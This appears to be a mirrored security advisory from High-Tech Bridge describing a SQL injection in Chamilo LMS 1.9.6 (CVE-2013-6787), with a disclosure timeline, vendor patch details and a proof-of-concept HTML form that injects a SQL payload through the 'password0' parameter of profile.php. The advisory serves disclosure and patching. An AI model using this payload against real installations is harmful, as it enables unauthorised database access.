Chamilo LMS 1.9.6 SQL Injection Vulnerability

🗓️ 27 Nov 2013 00:00:00Reported by High-Tech BridgeType

zdt🔗 0day.today👁 65 Views

Chamilo LMS 1.9.6 SQL Injection Vulnerability in "profile.php" allows remote attackers to execute arbitrary SQL commands. Vendor issued patch on November 9, 2013. Encryption method must be set to "none" for successful exploitation

Reporter	Title	Published	Views	Family All 13
0day.today	Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection Vulnerability	3 Dec 201300:00	–	zdt
Circl	CVE-2013-6787	3 Dec 201300:00	–	circl
CVE	CVE-2013-6787	5 Dec 201318:00	–	cve
Cvelist	CVE-2013-6787	5 Dec 201318:00	–	cvelist
Exploit DB	Chamilo Lms 1.9.6 - 'profile.php?password' SQL Injection	3 Dec 201300:00	–	exploitdb
EUVD	EUVD-2013-6589	7 Oct 202500:30	–	euvd
exploitpack	Chamilo Lms 1.9.6 - profile.php?password SQL Injection	3 Dec 201300:00	–	exploitpack
htbridge	SQL Injection in Chamilo LMS	6 Nov 201300:00	–	htbridge
NVD	CVE-2013-6787	5 Dec 201318:55	–	nvd
Packet Storm	Chamilo LMS 1.9.6 SQL Injection	27 Nov 201300:00	–	packetstorm

Vendor: Chamilo Association
Vulnerable Version(s): 1.9.6 and probably prior
Tested Version: 1.9.6
Advisory Publication:  November 6, 2013  [without technical details]
Vendor Notification: November 6, 2013 
Vendor Patch: November 9, 2013 
Public Disclosure: November 27, 2013 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-6787
Risk Level: Medium 
CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Chamilo LMS, which can be exploited to perform SQL Injection attacks.


1) SQL Injection in Chamilo LMS: CVE-2013-6787

The vulnerability exists due to insufficient validation of "password0" HTTP POST parameter passed to "/main/auth/profile.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The following exploitation example displays version of MySQL server:

<form action="http://[host]/main/auth/profile.php" method="post" name="main">
<input type="hidden" name="password0"  value="' OR substring(version(),1,1)=5 -- ">
<input type="hidden" name="password1"  value="password">
<input type="hidden" name="password2"  value="password">
<input type="hidden" name="apply_change"  value="">
<input type="hidden" name="firstname"  value="first_name">
<input type="hidden" name="lastname"  value="last_name">
<input type="hidden" name="username"  value="username">
<input type="hidden" name="official_code"  value="USER">
<input type="hidden" name="phone"  value="">
<input type="hidden" name="language"  value="">
<input type="hidden" name="extra_mail_notify_invitation"  value="">
<input type="hidden" name="extra_mail_notify_message"  value="">
<input type="hidden" name="extra_mail_notify_group_message"  value="">
<input type="hidden" name="_qf__profile"  value="">
<input type="hidden" name=""  value="">
<input type="submit" id="btn">
</form>


Successful exploitation of this vulnerability requires that the application is configured during installation not to encrypt users' passwords ("Encryption method" option is set to "none").

-----------------------------------------------------------------------------------------------

Solution:

Edit the source code and apply changes according to vendor's instructions:.

More Information:
https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues#Issue-10-2013-11-06-Moderate-risk-SQL-Injection-in-specific-unrecommended-case

#  0day.today [2018-02-07]  #

27 Nov 2013 00:00Current

7.6High risk

Vulners AI Score7.6

EPSS0.00591